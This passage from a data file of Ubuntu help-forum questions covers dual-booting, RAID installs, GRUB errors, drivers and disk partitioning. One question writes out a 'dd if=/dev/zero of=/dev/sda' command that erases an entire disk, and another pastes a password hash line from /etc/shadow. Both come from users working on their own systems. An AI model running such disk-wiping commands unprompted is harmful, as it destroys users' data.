334170	started w8/ubuntu 12.04 dual boot but got scared . how can i make sure to just run windows again like always ?	i have a pre-installed w8 laptop , and since i had always had no trouble dual-booting ubuntu with my older laptops , i saw no reason why i 'd have trouble now . however , i see that w8 is giving linux users a bit of trouble . anyway , i made an ubuntu 12.04 64-bit dvd , booted from the dvd , installed ubuntu 12.04 alongside w8 ( creating a partition for ubuntu through the installer ) , and it said it completed successfully . my laptop only boots to w8 . no hint of ubuntu . i read that turning of secure boot , running boot-repair in ubuntu , and a few other methods might fix this , but i also read of so many users not being able to boot back into w8 . i decided i 'm not cut out for this and will just keep my laptop how it is - running windows just fine . i 'm willing to sacrifice that partitioned harddrive space , but is there going to be any issue in my foreseeable future with my laptop like this ? i would delete the ubuntu partition , but i read about some people then having trouble since the grub menu replaced the windows boot manager . are there any precautionary measures i should take to ensure i have no trouble running w8 ?
334173	how to install ubuntu on a raid 5 array using mdadm	i want to install ubuntu 13.04 ( not server ) , i have 4 empty hard drives ( /dev/sda , /dev/sdb , /dev/sdc , /dev/sdd ) , each 150 gb and /sdd is 160 gb and i have a live usb . i want to install ubuntu on a raid 5 array using mdadm . what exactly do i need to do ? i made four ext4 filesystems and four swap partitions and created an array ( of all 8 ) , but after install it did n't boot . and on this thread , i read something about a separate /boot partition , but i do n't really get that . can someone explain this please ? i understand the problem , but i do n't know how to solve it .
334175	how to partition and install ubuntu ?	i 'm using my ubuntu live 12.04 lts cd because i have no other os that is functional . my vista home premium 64-bit crashed repeatedly , and i have no intention of paying for anymore windows os . here 's my problem : ubuntu will only boot from the cd i created . no such device , grub rescue errors on boot disc read error . i partitioned over 30 gigs of space on my external toshiba drive for the ubuntu install ( i have no clue what i am doing here ) . the forums say to try to fix it myself , and i have looked at so many posts with install issues that my head is `` swimming '' ! now i am in deep ... vista will not boot at all , ca n't even access the files on it . i do n't know what i am doing , there is a red `` ! '' next to my main hard drive ( 500 gig ) ( ntfs ) ( not mounted ) and the error does not display completely in gparted - i do n't know how to copy that error list and it 's not scrollable . what it does say is : **filesystem check failed . 40186 clusters are referenced multiple times ntfs is inconsistent . run chkdsk /f on windows then reboot it twice . ( um , does that mean on a terminal because i ca n't load windows ? should i do this or will it get worse ? ) the usage of the /f parameter is very important . no modification was and will be made to ntfs software until it gets repaired . ** unable to read the contents of the file system . the cause might be a missing software package . the following list of software packages is required for ntfs ... and that is where the error ends , no scroll , no package list . as far as my usb external toshiba drive ( 1tb ) is unmounted , i deleted the ubuntu files and reverted to the `` unallocated '' 32 gig partition , so it is empty . but the swap remains . the `` extended '' ( sbd2 ) and swap ( sbd5 ) are showing as locked ( key showing ) in gparted . after attempting to install ubuntu 12.04 lts , would n't boot , even with bios changed boot drive every way ... i uninstalled it , but left the swap as i had read in a few posts . what do i do to fix this mess ? if i install it on my hdd ( 500 gig ) overwriting all my files and programs , will it work or will i still have these problems ? this is what i get with sudo fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x97646c29 device boot start end blocks id system /dev/sda1 63 24579449 12289693+ b w95 fat32 /dev/sda2 24579450 976771119 476095835 7 hpfs/ntfs/exfat disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x525d39b7 device boot start end blocks id system /dev/sdb1 * 2048 2849062911 1424530432 7 hpfs/ntfs/exfat /dev/sdb2 2849064958 2930276351 40605697 5 extended /dev/sdb5 2917697536 2930276351 6289408 82 linux swap / solaris ubuntu @ ubuntu : ~ $ update : both drives now mounted . the new fdisk results are : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x97646c29 device boot start end blocks id system /dev/sda1 63 24579449 12289693+ b w95 fat32 /dev/sda2 * 24579450 976771119 476095835 7 hpfs/ntfs/exfat disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x525d39b7 device boot start end blocks id system /dev/sdb1 2048 2849062911 1424530432 7 hpfs/ntfs/exfat /dev/sdb2 2849064958 2930276351 40605697 5 extended /dev/sdb5 2917697536 2930276351 6289408 82 linux swap / solaris
334183	ubuntu pc does n't boot from the second hd ( debian )	on my pc i have two physical hds : 160 + 40 gb . on the first hdd i have ubuntu and it is running without problems ( it 's the one i 'm using.. ) . i installed debian on the second hd without particular problems , but i 'm not able to boot with it . i 'm using the main ubuntu grub to start the debian one . with different grub configurations i received error 21 ( selected disk does not exist ) orerror 15 ( file not found ) . for the main hdd i 'm using ( hd0,0 ) , and for the second hdd i 'm using ( hd1,0 ) names . if i declare root ( hd1,0 ) i receive : error 21 selected disk does not exist . if i declare uuid=xxxxxx i receive error 15 : file not found ubuntu has grub1 and the debian has grub2 . if i type fdisk -l. i see two disks ( sda and sdb ) . the bios shows only one disk ( i guess the first disk ) . is this correct ? how can i boot the second distribution ?
334185	12.04 , acer , actiontek	my home wireless router will not accept any password and let me connect . it goes to the connect screen and will continually reject my password . i tested the password on another device to make sure it worked , i have copied and pasted it and typed it in visible plain text multiple times to see if it works . my computer works on the wireless router in the local coffee shop . specs : computer is an acer aspire v3-571g-6407 , ubuntu 12.04 lts 64 bit router : http : //www.actiontec.com/products/cat_desc.php ? fid=42 03:00.0 network controller : atheros communications inc. ar9462 wireless network adapter ( rev 01 ) any ideas ?
334186	how do i use easybcd as bootloader with windows 8 and uefi ?	i know this question has been asked a lot , but i did n't find an answer here . ubuntu 12.04.2 64-bit was installed offline just a few hours ago on one ext4 partition , and a swap partition was also created . the installation went fine , but now i ca n't get into ubuntu . i want to use the windows 8 boot manager , to select between the two operating systems , so i downloaded easybcd and added an entry for ubuntu . the entry shows up in the boot manager menu , but when i click on ubuntu i get the following message : nst/autoneogrub0.mbr not found i tried enabling/disabling secure boot and restarting , but it still shows that error message . boot repair summary latest boot repair summary out of desperation i tried to find a solution myself and reset the bcd configuration via easybcd . now grub boots fine and ubuntu too , but i ca n't boot windows 8 anymore . then , for whatever reason after installing all updates for ubuntu , i restarted the system and now i ca n't boot into ubuntu . only via live cd and the old linux entry can i start it .
334188	error while running java in eclipse	i 'm getting an invalid error while creating project name of java in eclipse . i hope you suggest me any solution to it . error : # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007f0be18f4a29 , pid=3098 , tid=139689460168448 # # jre version : 6.0_27-b27 # java vm : openjdk 64-bit server vm ( 20.0-b12 mixed mode linux-amd64 compressed oops ) # derivative : icedtea6 1.12.6 # distribution : ubuntu 12.04 lts , package 6b27-1.12.6-1ubuntu0.12.04.2 # problematic frame : # c [ libgail.so+0x36a29 ] gail_misc_get_type+0xa89 # # if you would like to submit a bug report , please include # instructions how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-6/ # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . #
334193	installing ubuntu tv	i have installed desktop and wanted to install ubuntu tv . i followed the instructions , and rebooted to the login screen . i clicked unity 2d , but it just takes me back to my main login screen , where i have to enter a password again . loop ? how can i fix this ?
334196	fglrx issues with amd mobility radeon hd 2600 xt on xubuntu 13.04	the problem i have a rather old ( ~2007ish ) imac , which i 've recently installed xubuntu 13.04 ( 64 bit ) on . for various reasons it 's important that i 'm able to get reasonable 2d graphics acceleration on this machine , and unfortunately mesa does n't quite cut it . i 've therefore been battling to install the proprietary amd drivers , but with no success so far . according to the output of lspci | grep vga , i seem to have an amd mobility radeon hd 2600 xt/2700 . looking in settings manager > software & updates > additional drivers i do n't see any option to install a proprietary display driver . things i 've tried : 1 ) installing fglrx or fglrx-updates from the normal raring restricted repository in both cases lightdm does n't start at all . dmesg | tail gives me : [ 21.939526 ] amd iommuv2 driver by joerg roedel < joerg.roedel @ amd.com > [ 21.939530 ] amd iommuv2 functionality not available on this system` [ 22.078527 ] < 6 > [ fglrx ] maximum main memory to use for locked dma buffers : 1873 mbytes . [ 22.078991 ] < 3 > [ fglrx : firegl_init_device_list ] *error* no supported display adapters were found [ 22.078993 ] < 3 > [ fglrx : firegl_init_module ] *error* firegl_init_devices failed based on the amd website and on various other answers on this site , it seems that the radeon hd 2000 - 4000 series of adapters is no longer supported by the mainline catalyst drivers available directly from amd , or the fglrx packages available from the standard ubuntu repositories . 2 ) adding this repository , downgrading xserver to 1.12.4 and installing fglrx-legacy this time the lightdm process seems to start , but the display is totally glitched-out ( weird moving colour gradients ) . i see this in dmesg | tail : [ 18.562524 ] fglrx_pci 0000:01:00.0 : irq 48 for msi/msi-x [ 18.562950 ] < 6 > [ fglrx ] firegl kernel thread pid : 1264 [ 18.563022 ] < 6 > [ fglrx ] firegl kernel thread pid : 1265 [ 18.563091 ] < 6 > [ fglrx ] firegl kernel thread pid : 1266 [ 18.563203 ] < 6 > [ fglrx ] irq 48 enabled [ 19.847271 ] < 6 > [ fglrx ] gart uswc size:624 m. [ 19.847275 ] < 6 > [ fglrx ] gart cacheable size:245 m. [ 19.847279 ] < 6 > [ fglrx ] reserved fb block : shared offset:0 , size:1000000 [ 19.847281 ] < 6 > [ fglrx ] reserved fb block : unshared offset : fe0b000 , size:1f5000 3 ) installing the legacy catalyst drivers downloaded directly from the amd website during the installation i get a message saying dkms part of installation failed . please refer to /usr/share/ati/fglrx-install.log for details . the install log says this : cd /var/lib/dkms/fglrx/8.97.100.7/build ; sh make.sh -- nohints -- uname_r=3.8.0-27-generic -- norootcheck ... ... ( bad exit status : 1 ) [ error ] kernel module : failed to build fglrx-8.97.100.7 with dkms [ error ] kernel module : removing fglrx-8.97.100.7 from dkms it 's presumably failing to build because that driver only supports kernel versions up to 3.4 , whereas mine is 3.8.0-27 . what next ? is there any way i can get proprietary amd drivers working on ubuntu with a radeon hd 2600 xt ? i 'm open to other options , such as downgrading my version of ubuntu or switching to a different window manager . could anyone suggest any combination of ubuntu and catalyst versions that are likely to be compatible ?
334197	md5 hashing with salt length of 5	i 'm newbie in ubuntu and currently using it for assignment . i 've checked my encrypted password at /etc/shadow folder and found that my encrypted password using md5 encryption , but my problem is the salt length is 5 . i 've check various sites saying that the md5 salt should be length of 8 while mine is only 5 . here is what i get when i run sudo grep < username > /etc/shadow : $ 1 $ azfpj $ yxxdgbaymqqsbtl2nujzm . :15935:0:99999:7 : : : my questions are : what is the algorithm if it 's not md5 ? how come the salt length is 5 ? anyway to change the length of the salt ?
334200	atheros wireless ar9285 driver	i have been having problems with wireless on ubuntu 10 and above , mint 11 and above . the problem is in the driver for the wireless ... i can see that there is no driver installed and yet it works but reduced a lot , for example : on windows 7 ultimate 100 % on distance of 1 meter ( currently running ) mint cinnamon 15 on same distance 70 % when it goes under the 40 % it simply disconnects and than takes a lot of time to connect again i am new to linux and i do n't know anything about programming , yet i love the interface and look of the os but do n't want to reject it for couple of problems . there is , however , a problem with brightness control on laptop , it shows the notification and slider but with no effect the question is : can somebody explain to me where to download and how to install the ar9285 driver for atheros wireless card laptop acer emachines eme529 ? or can someone explain this to me only for the linux mint 15 http : //www.jrhenkelmann.net/index.php ? option=com_content & task=view & id=34 because the synaptic 's interface is different than of mint 15 i know this is ubuntu community but the problems persist in all linux versions
334201	how do i set a different wallpaper for each workspace in xubuntu 13.04 ?	this might seem like a common question that have been already solved . well , i checked many tutorials , question and googled a lot but almost everything failed after all . the main problem is that i do not have gconf-editor and even if i install it , i do n't have an `` /apps/nautilus/preferences/show_desktop '' option to uncheck to finish whole quite known compiz tweak . does anybody managed this issue on xubuntu 13.04 ? may i ask how ? thank you in advance .
334206	unable to activate ms office 2010 on ubuntu 12.04 64-bit/ playonlinux	i have installed ms office on ubuntu 12.04 64 bit through playonlinux . however i have noticed that the text box in product activation is not enabled . is there a way to resolve the issue ? i referred the link install office 2007 using playonlinux ( wine ) will not allow to enter cdkey but i am unable to install riched30.dll .
334207	hdmi sound isnt working , but it is detected	first of all i have just started using ubuntu and i am not a real expert on coding . then my problem is the following my laptop recognises my hdmi-cable and when i select the hdmi as sound output it doesnât give any sound . i took the following screenshots to illustrate my problem : pulseaudio volume control : system sound : and the output for the command : aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : stac92xx digital [ stac92xx digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 i hope this is enough information .
334209	ubuntu 12.04 precise only reboots does not shut-down	okay here 's the question : ubuntu 12.04 precise will not shut-down it just reboots again ! its as simple as that . i have tried every command out there and not a single one of these commands works in grub or ctrl + alt + t or any other method suggested . sudo shutdown -p now < -this does not work type in terminal : sudo -i ( to get a root shell , sudo gedit is not recommended ) gedit /etc/default/grub find the line : grub_cmdline_linux_default= '' quiet splash '' change this to : grub_cmdline_linux_default= '' quiet splash acpi=force '' save the file and close the file . finally , in terminal : update-grub exit ( to end the root shell ) < -this does not work sudo poweroff < -this does not work alt + f2 and type gksudo poweroff < -this does not work code : sudo gedit /etc/default/grub -- > remove quiet splash , then : sudo update-grub before trying to shut down again , run : sudo apt-get install -- reinstall ubuntu-desktop sudo dpkg-reconfigure -phigh -a < -this does not work halt or shutdown -h now < -this does not work sudo init 0 < -this does not work acpi=norq added to grub < -this does not work typing shutdown or restart in dash home < -this does not work sudo shutdown -h 0 < -this does not work sudo halt < -this does not work sudo shutdown -h 0 < -this does not work so lets try to figure it out together , lets solve it since no updates are coming in to fix it !
334211	how do i download and install from the web to a windows xp system	i have spent hours downloading ubuntu and `` installing '' , i do n't know what ! could you kindly suggest a web site and choices ( if this is possible ) .
334215	how can i install ubuntu server on a pre-configured raid configuration ?	i recently came into possession of an ibm xseries 346 server with 4 scsi drives in some raid configuration . the server does n't boot so i thought i would install ubuntu server ( 12.04 ) on it , but when i go through the installation it does n't find the disks . i 'm assumming this is is because the drives are handled by the serveraid-7k card . i 've tried putting ubuntu drivers for the serveraid-7k on a usb to access while installing , but it did n't detect the usb drive so i 'm kind of lost . how can i install ubuntu server on this x346 ?
334219	gvim produces error when hitting the close window on ubuntu 13.04	everytime i close a gvim window with the little x on the window or alt + f4 . i get the following error and have to hit return to get my command prompt back . has anyone seen this ? ( gvim:26639 ) : glib-gobject-warning ** : can not retrieve class for invalid ( unclassed ) type ` < invalid > '
334223	trouble installing 13.04 on samsung series 9	i have been having the hardest time trying to install ubuntu on my samsung series 9 np900x3a-a03us . after installing , it goes in an infinite reboot loop . i tried different ways of installing , the latest is in legacy mode with uefi turned off in bios . bios version is 08hl . here is the paste bin link after running boot-repair : http : //paste.ubuntu.com/6000365/ i am a bit of an ubuntu newbie , and this installation has been quite frustrating . i am almost resorting to just installing windows 8 on the machine and be done with it but i do n't want to give up just yet . any help would be great .
334226	ca n't disable backlit keyboard on sony viao , ubuntu 13.04 , 64bit	i need to turn off the backlit keyboard on my sony viao , with 64 bit ubuntu 13.04 . i 'm prone to migraines , and the lights really bother my eyes . i 've ried several posted solutions , none work . ( although one worked on ubuntu 12.xx 32bit ) here are some of the threads i 've tried : keyboard backlighting not working on a vaio laptop cant disable , control keyboard backlight on sony vaio vpcf236fm keyboard backlit - ubuntu 12.10 - sony vaio keyboard backlighting not working on a vaio laptop these do n't work : echo 0 > /sys/devices/platform/sony-laptop/kbd_backlight the directory exists , but not the file . this looked promising : sudo modprobe -v sony-laptop modinfo sony-laptop but then , neither of these worked : sudo modprobe -v sony-laptop kbd_backlight=0 sudo rmmod -v sony-laptop ; sudo modprobe -v sony-laptop kbd_backlight=0 i guess i 'll try this anyway , and reboot : echo `` options sony-laptop kbd_backlight=1 '' | sudo tee /etc/modprobe.d/sony-laptop.conf i 'll let you know if it worked .
334229	dash is not searching all files	i have two laptops running ubuntu 13.04 . the only difference between them is that one has an encrypted home folder and i guess it is the reason preventing the dash to index , search and display all files but the opened . i have already tried sudo updatedb as suggested here and elsewhere , and deleted the cache folder ( as well as the program and config files ) of usc as stated in a well reputed answer . after logout or reboot , the behavior is the same . question is : how can i get the searching dash in the second case ? laptop 1 same search , laptop 2 ( encrypted home )
334236	netflix desktop does n't launch when i click on it	i would like to be able to watch netflix on ubuntu 13.04 , but on the website it does n't let me do so . i also attempted to download netflix-desktop but when i click the icon it does n't do anything . thank you .
334244	how to know whether an nvidia graphic card is installed or not ?	my terminal says : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev ff ) it seems to me that it is installed but ca n't find the control panel .
334247	cant install java on wand board quad running ubuntu 12.04	i picked up the wand board and was curios to see on how well it can perform as a minecraft server . so i downloaded the jdk 8 from the official site for arm and extracted it to my opt folder , after doing so i ran `` java -version '' from the folder and it said java is not found . inaro @ linaro-ubuntu-desktop : ~ $ opt/jdk1.8.0/bin/java -xmx768m -xms768m $ { gc_opts } -jar tekkit.jar nogui -bash : opt/jdk1.8.0/bin/java : no such file or directory linaro @ linaro-ubuntu-desktop : ~ $ even though it exists ! ' linaro @ linaro-ubuntu-desktop : ~ $ cd /opt linaro @ linaro-ubuntu-desktop : /opt $ ls jdk1.8.0 linaro @ linaro-ubuntu-desktop : /opt $ cd jdk1.8.0 linaro @ linaro-ubuntu-desktop : /opt/jdk1.8.0 $ ls copyright readme.html bin include lib release license thirdpartylicensereadme.txt db jre man src.zip linaro @ linaro-ubuntu-desktop : /opt/jdk1.8.0 $ cd bin linaro @ linaro-ubuntu-desktop : /opt/jdk1.8.0/bin $ ls appletviewer javac jdeps jsadebugd pack200 servertool extcheck javadoc jhat jstack policytool tnameserv idlj javah jinfo jstat rmic unpack200 jar javap jjs jstatd rmid wsgen jarsigner jcmd jmap keytool rmiregistry wsimport java jconsole jps native2ascii schemagen xjc java-rmi.cgi jdb jrunscript orbd serialver linaro @ linaro-ubuntu-desktop : /opt/jdk1.8.0/bin $ any help would be appreciated !
334248	after pip install -- upgrade dpkg still lists old python packages	i recently upgraded all python data analysis tools using pip . when i do dpkg -l |grep python i see the old version numbers of the software i just upgraded via pip . how can i ensure that the dpkg list reports the correct versions ? ( i assume dpkg -l needs to be correct ) for example , i upgraded ipython to version 1.0.0 using pip ; however , dpkg reports version 0.13.2-1~ubuntu12.04.1
334256	trying to run executable ( application/x-executable ) but to no avail	i am trying to run a executable ( application/x-executable ) file i have tried everything it i am trying to install a software which is part of a behringer x32 ... please guys help please please please.what is the correct way or line to run via the terminal . thank you in advance .
334258	ubuntu arabic font family	why are the ubuntu font developers taking too long to finalize the arabian font family ? and what happened to the beta arabic font ? why is n't it supported anymore ? thanks ...
334265	from a bare minimum ubuntu to something like an aws ubuntu standard image	if i am given a bare minimum ubuntu machine in a private cloud environment with almost nothing installed on it ( not even apt-get and ubuntu repositories configured ) and the only user is root , what are the set of commands to run to turn this machine as configured as an ec2 standard ubuntu 12.04 image ? one can find these commands here and there but i am looking for something that induces all i need to run to have a properly configuration machine as good as the amazon ubuntu ami .
334266	entering rescue mode grub rescue >	to uninstall ubuntu 13.04 i run a command wipe in terminal but due to some reason my system shuts down in between the command was running and cleaning specific system drive . and now when i am trying to boot it showing grub loading . welcome to grub ! error : no such partition . entering rescue mode ... grub rescue > please tell me what to do , i do n't have boot cd or usb of ubuntu 13.04 , whereas i have bootable usb of fedora and win7 .
334267	how do i back up network and printer settings ?	network and printer settings are not stored in users ' /home directories and so will be overwritten by a fresh install of ubuntu . how can i back up those settings to ensure that i do not lose my current setup for wireless networks and printers ? i 'm running ubuntu 13.04 but i imagine this is something that can be answered generically for all ubuntu versions .
334268	ubuntu 13.04 does not recognize wireless adapter ( 14e4:4365 )	i replaced windows 8 on my laptop with ubuntu and neglected to check if my wifi adapter ( 14e4:4365 ) would work . i 've tried a few solutions to make it work , but i ca n't seem to make it happen . i do n't have access to internet on the computer-i 'm at a hotel on a business trip-but i can transfer files from a laptop with internet to the one with the issue . result running lspci -nn | grep 0280 : 07:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 )
334269	apache does n't serve files to be interpreted by the browser but to be downloaded	i recently reinstalled my whole webserver , and i am now hosting some documents from home for personal use . now , whenever i go to that page , it automatically downloads the .html and .php documents . i 've tried googling my problems , and no results .
334270	ca n't remove gpt table from hard drive	i have tried everything , but nothing works ... background : started out with windows 7 , formated and installed ubuntu and later installed arch linux with a gpt partition table . running following commands from ubuntu 12.04 live usb . starting with : have arch linux installed with four partitions . using gpt . /dev/sda1 root partition /dev/sda2 bios boot partition /dev/sda3 swap partition /dev/sda4 /home partition step 1 : sudo parted /dev/sda mklabel msdos get the `` gpt signatures found '' -error message then i check . step 2 : sudo dd bs=4m if=/dev/zero of=/dev/sda still get the error message . step 3 : sudo dd bs=1m if=/dev/zero of=/dev/sda still get the damned error message about gpt signatures found . step 4 > sudo parted /dev/sda mktable msdos i 'm not giving up ! even this does n't work , and the error message appear . output from sudo fdisk -l : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0004cb5a device boot start end blocks id system warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 2103 mb , 2103443456 bytes 255 heads , 63 sectors/track , 255 cylinders , total 4108288 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x71bafca0 device boot start end blocks id system /dev/sdb1 * 0 1607679 803840 0 empty /dev/sdb2 1595952 1600495 2272 ef efi ( fat-12/16/32 ) warning : gpt ( guid partition table ) detected on '/dev/sdb1 ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb1 : 823 mb , 823132160 bytes 255 heads , 63 sectors/track , 100 cylinders , total 1607680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x71bafca0 device boot start end blocks id system /dev/sdb1p1 * 0 1607679 803840 0 empty /dev/sdb1p2 1595952 1600495 2272 ef efi ( fat-12/16/32 ) output from sudo parted -l model : ata st250lt007-9zv14 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags [ gpt-signatures-found error message ] what should i do to remove the last fragments of the gpt table ? trying to reinstall arch again , but ca n't use cgdisk to create partitions .
334273	how to mount a synology diskstation nas	i am a long time windows person , with a little experience in ubuntu . i am trying to set up plex media server on a new ubuntu 12.04 lts machine . my video library is on a synology diskstation nas named sequoia2 , and for the life of me ( at least the past 3 hours of it ) i have been unable to configure the movies and tv library sections in plex . these are located on the nas ( in windows-speak ) in \\sequoia2\video\movies and \\sequoia2\video\tv . unfortunately , i am finding all sorts of posts with all sorts of ways of doing this , and i 've tried several with no success . surely there must be a well accepted , `` right '' way to go about this . i do n't want plex to lose these connections after a reboot , and from what i can tell , this will involve creating a mount in fstab . could someone tell me the best way to do this ?
334277	usb audio on 12.04 lts	i have a schiit audio usb dac . in the 'sound ' section of system settings , i can see the device , but when i push the test button , it does n't work . if i run 'gstreamer-properties ' from terminal , and test there with alsa , it works-but i ca n't get sound to work from system settings or in any application .
334279	white text on white background	here is an example : this does not happen in all windows , only in some ( it also happens in ubuntu tweak , and for the text in the tabs of terminal ) . i installed the mediterraneannight theme when this occurred . i 've found some other people who have had similar problems but the only solution i 've been able to find is to change the gtk.css files in the theme folders . i 've checked those and have verified that the text_color is set to # 282828 , which is a dark grey , not white . i 've checked : /usr/share/themes/mediteranneanlightdarkest/gtk-2.0/gtkrc /usr/share/themes/mediteranneanlightdarkest/gtk-3.0/gtk.css /usr/share/themes/mediteranneanlightdarkest/gtk-3.0/settings.ini and all of them report that text_color is # 282828 . the only thing that is set to # ffffff is selected_fg_color and tooltip_fg_color but i do n't believe those are the problem since those are the same as in the ambiance theme , which is not having this same problem . here is a link to the theme for reference : http : //gnome-look.org/content/show.php/mediterraneannight+series ? content=156782 and if it 's relevant i am using gnome 3 on ubuntu 12.04 edit : also let me add that i am looking for a solution that will fix the text color and let me keep my theme . i can fix the problem by switching to a different theme , but i 'd rather not have to do that .
334283	gtk scrollbar with transparent or no trough	is it possible in gtk-2 or/and gtk-3 to remove the scrollbar trough or make it invisible ? i know there are scripts to remove the scrollbar steppers , like : gtkscrollbar : :has-forward-stepper = 0 now i want to know if there is such script to remove the trough . in other words , gtk scrollbar is at the end of content , but i want to put it over the content – just like overlay scrollbar . edit : let’s make my question more clear . i’ve edited both gtk-2 and gtk-3 themes to make scrollbars more similar to overlay since i don’t like a low-contrast wide scrollbar . so i edited gtkrc and gtk-widgets.css files to change the slider color to orange and the trough to white , but as seen in the screenshot below the contrast between the trough and a dark background is annoying . the question is here if it’s possible to completely remove the trough or make it transparent . i guess the latter is possible . my ideal is something like this :
334286	why my gnome terminal is set to root by default ?	when i try to open up a new terminal in ubuntu to do some operations , it always defaults to an admin based terminal with [ sudo ] password for xxxxxxxx : $ i need a regular terminal . how do i do this ? i like having to type sudo before my commands as this makes it safe . when i d type in my password it closes out and then nothing not even a peep . what is going on ? by the way xterm works fine .
334295	what is the command for package manager | settings | repositories | source code	i tried to do step two of building banshee from source , but it failed as follows : ~ $ sudo apt-get build-dep banshee reading package lists ... done building dependency tree reading state information ... done e : unable to find a source package for banshee i was able to solve this problem by executing package manager | settings | repositories | source code , followed by the command sudo apt-get update after which the build-dep step succeeded . is there a non-gui way of enabling the source code repositories for apt-get ? the man page says there 's apt-get source , but it is n't clear to me that command has the same effect .
334296	can i run two keyboards and mice in different apps ?	is there any way to run two inputs for different apps ? e.g . when in a game called minetest you can run a local server and setup a dual player but not dual controls .
334298	how do i change or delete the album cover image shown in rhythmbox ?	i have ubuntu 12.04 installed , and i have some wrong covers associated with albums . i 've already disabled the cover plug-in , but the wrong covers that were downloaded are still being shown when i play the songs they are associated with . i want to know how to delete these covers so that rhythmbox wo n't show them anymore . maybe if someone could give the terminal code to access the rhythmbox cover folder so i can delete these cover images , or something like that ...
334302	usb bootdisk files help	i had files on a usb ubuntu boot disk that i would like to retrieve . i copied the files to a rar file on my hard drive . i would like to know if there is anyway i can access the files that were in the boot drive desktop , as i do not have the usb drive any more . can anyone help me ?
334305	newbie need help setting up a lan network for freelancer game	i am new to linux , and i 'm looking to set up a lan game network from my house . i was told that ubuntu would be a good place to start . i tried to set up an old computer , but i ca n't get it right . the game is called freelancer , and the computer is a dual core with 512mb of ram . i ca n't get the game to work right . i have wine , but i do n't know if it is working right or if i need anything else .
334306	binding a partition or drive after fstab	i have modified the fstab to automatically mount a partition and set up an aufs on a read-only filesystem and a folder in partition . but somehow in the boot up , i saw that it could n't find the folder in that partition . i have certain programs that start on boot up and it requires the aufs filesystem . i was wondering if there is a way of mounting after fstab .
334311	ubuntu 13.04 - dual-monitors - primary monitor : black screen , secondary monitor : unresponsive desktop	so i recently installed ubuntu 13.04 alongside windows 7 and i 'm loving it so far . everything is working fine except my second monitor . if i 'm already in ubuntu when i plug the second monitor in , everything works fine ( except for the limited resolution ) . but if i then reboot , my primary monitor is completely black and the secondary monitor has the desktop but is completely unresponsive . graphics card : xfx radeon hd 6850 primary monitor : dvi secondary monitor : vga if you need any more information , please ask . thank you .
334312	multiple /home mountpoints	i have 5 hard drives 1.5tb and 4-750 's . what i want to do is make the 4-750 's into a raid10 . i already have a /home mountpoint on the 1.5tb drive . i want to use the raid as data only no os stuff at all . this will be storing movies and music for the network dlna server/plex . if i mount the raid10 as /home , will all the data go to the raid drives then fill up the 1.5tb /home mount point , or will the system combine the two ? what would be the best thing to do ? ubuntu 12.04lts 64bit is installed and working great . p.s . i do n't even care a single thing about windows any more so that will not be an issue . *-disk description : ata disk product : st31500341as vendor : seagate physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/sda version : cc1h serial : 9vs0m7fn size : 1397gib ( 1500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=000762a6 *-disk description : ata disk product : samsung hd753lj physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/sdb version : 1aa0 serial : s13ujdwq401868 size : 698gib ( 750gb ) configuration : ansiversion=5 *-disk description : ata disk product : samsung hd753lj physical id : 0.0.0 bus info : scsi @ 5:0.0.0 logical name : /dev/sdc version : 1aa0 serial : s13uj1kq701933 size : 698gib ( 750gb ) configuration : ansiversion=5 *-disk description : ata disk product : st3750640as vendor : seagate physical id : 0.0.0 bus info : scsi @ 7:0.0.0 logical name : /dev/sdd version : 3.af serial : 5qd3zr86 size : 698gib ( 750gb ) configuration : ansiversion=5 *-disk description : ata disk product : st3750640as vendor : seagate physical id : 0.0.0 bus info : scsi @ 8:0.0.0 logical name : 